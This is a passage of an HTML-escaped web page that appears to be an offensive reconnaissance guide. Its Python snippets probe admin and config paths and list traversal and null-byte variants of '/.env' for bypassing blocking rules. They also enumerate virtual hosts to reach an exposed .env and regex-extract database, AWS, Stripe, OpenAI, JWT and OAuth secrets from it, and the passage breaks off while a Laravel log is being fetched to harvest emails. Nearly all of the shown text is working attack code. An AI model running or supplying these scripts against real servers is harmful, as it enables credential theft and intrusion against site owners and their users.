&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/admin&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/login&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/dashboard&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/panel&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/manager/html&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/host-manager/html&amp;#34;&lt;/span&gt;, &lt;span style="color:#737994;font-style:italic"&gt;# Tomcat&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Misc&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/robots.txt&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/sitemap.xml&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/.htaccess&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/nginx.conf&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/.well-known/security.txt&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/server-status&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/server-info&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/phpmyadmin&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/_phpmyadmin&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/pma&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; f &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; files:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;try&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;base&lt;span style="color:#a6d189"&gt;}{&lt;/span&gt;f&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;, timeout&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;10&lt;/span&gt;, allow_redirects&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;False&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;status_code &lt;span style="color:#99d1db;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;200&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;and&lt;/span&gt; &lt;span style="color:#99d1db"&gt;len&lt;/span&gt;(r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;text) &lt;span style="color:#99d1db;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;20&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;✅ &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;f&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt; (&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;&lt;span style="color:#99d1db"&gt;len&lt;/span&gt;(r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;text)&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;b): &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;text[:&lt;span style="color:#ef9f76"&gt;150&lt;/span&gt;]&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;elif&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;status_code &lt;span style="color:#99d1db;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;301&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;or&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;status_code &lt;span style="color:#99d1db;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;302&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;⚠️ &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;f&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt; -&amp;gt; redirect &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;status_code&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt; to &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;headers&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#a6d189"&gt;&amp;#39;Location&amp;#39;&lt;/span&gt;)&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;elif&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;status_code &lt;span style="color:#99d1db;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;401&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;or&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;status_code &lt;span style="color:#99d1db;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;403&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;🔒 &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;f&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt; -&amp;gt; &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;status_code&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt; (exists, blocked)&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;except&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;Exception&lt;/span&gt; &lt;span style="color:#ca9ee6"&gt;as&lt;/span&gt; e:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;pass&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="52-path-traversal--bypass" &gt;
&lt;div&gt;
&lt;a href="#52-path-traversal--bypass"&gt;
##
&lt;/a&gt;
5.2 Path Traversal &amp;amp; Bypass
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Bypass variations for blocking rules&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;paths &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/../.env&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/&lt;/span&gt;&lt;span style="color:#a6d189"&gt;%2e%2e&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/.env&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/..&lt;/span&gt;&lt;span style="color:#a6d189"&gt;%2f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.env&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/public/../.env&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/storage/../.env&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/html/../.env&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/app/../.env&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/www/../.env&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/.%00.env&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/.env%00.html&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/.env%23&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="53-virtual-host-vhost-enumeration" &gt;
&lt;div&gt;
&lt;a href="#53-virtual-host-vhost-enumeration"&gt;
##
&lt;/a&gt;
5.3 Virtual Host (vHost) Enumeration
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;If the IP serves multiple sites, the default vhost may be insecure and expose files.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Test different Host headers on the server IP&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;hosts &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;target.com&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;www.target.com&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;admin.target.com&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;api.target.com&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;dev.target.com&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;localhost&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;127.0.0.1&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;internal&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;test&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; host &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; hosts:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;try&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;http://SERVER_IP/.env&amp;#34;&lt;/span&gt;, headers&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a6d189"&gt;&amp;#34;Host&amp;#34;&lt;/span&gt;: host}, timeout&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;5&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;APP_KEY&amp;#34;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;text &lt;span style="color:#99d1db;font-weight:bold"&gt;or&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;DB_PASSWORD&amp;#34;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;text &lt;span style="color:#99d1db;font-weight:bold"&gt;or&lt;/span&gt; &lt;span style="color:#99d1db"&gt;len&lt;/span&gt;(r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;text) &lt;span style="color:#99d1db;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;50&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;✅ .env exposed via Host: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;host&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;except&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;pass&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="54-automatic-env-credential-extraction" &gt;
&lt;div&gt;
&lt;a href="#54-automatic-env-credential-extraction"&gt;
##
&lt;/a&gt;
5.4 Automatic .env Credential Extraction
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;re&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;env_content &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#a6d189"&gt;&amp;#34;http://target/.env&amp;#34;&lt;/span&gt;, timeout&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;10&lt;/span&gt;)&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;text
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;patterns &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;DB_HOST&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;DB_HOST=(.+)&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;DB_DATABASE&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;DB_DATABASE=(.+)&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;DB_USERNAME&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;DB_USERNAME=(.+)&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;DB_PASSWORD&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;DB_PASSWORD=(.+)&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;APP_KEY&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;APP_KEY=(.+)&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;APP_URL&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;APP_URL=(.+)&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;REDIS_HOST&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;REDIS_HOST=(.+)&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;REDIS_PASSWORD&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;REDIS_PASSWORD=(.+)&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;MAIL_USERNAME&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;MAIL_USERNAME=(.+)&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;MAIL_PASSWORD&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;MAIL_PASSWORD=(.+)&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;AWS_KEY&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;AWS_(?:ACCESS_KEY_ID|SECRET_ACCESS_KEY)=(.+)&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;SENDGRID&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;SENDGRID_API_KEY=(.+)&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;SENTRY&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;SENTRY_DSN=(.+)&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;JWT_SECRET&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;JWT_SECRET=(.+)&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;OAUTH&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;OAUTH_(?:CLIENT_ID|CLIENT_SECRET)=(.+)&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;FIREBASE&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;FIREBASE_.+=(.+)&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;OPENAI&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;OPENAI_API_KEY=(.+)&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;STRIPE&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;STRIPE_(?:KEY|SECRET)=(.+)&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; name, pattern &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; patterns&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;items():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; matches &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; re&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;findall(pattern, env_content)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; m &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; matches:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;🔑 &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;name&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;m&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;strip()&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="55-log-data-extraction" &gt;
&lt;div&gt;
&lt;a href="#55-log-data-extraction"&gt;
##
&lt;/a&gt;
5.5 Log Data Extraction
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;log &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#a6d189"&gt;&amp;#34;http://target/storage/logs/laravel.log&amp;#34;&lt;/span&gt;, timeout&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;30&lt;/span&gt;)&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;text
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# or /wp-content/debug.log, /var/log/apache2/error.log&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Extract emails&lt;/span&gt;
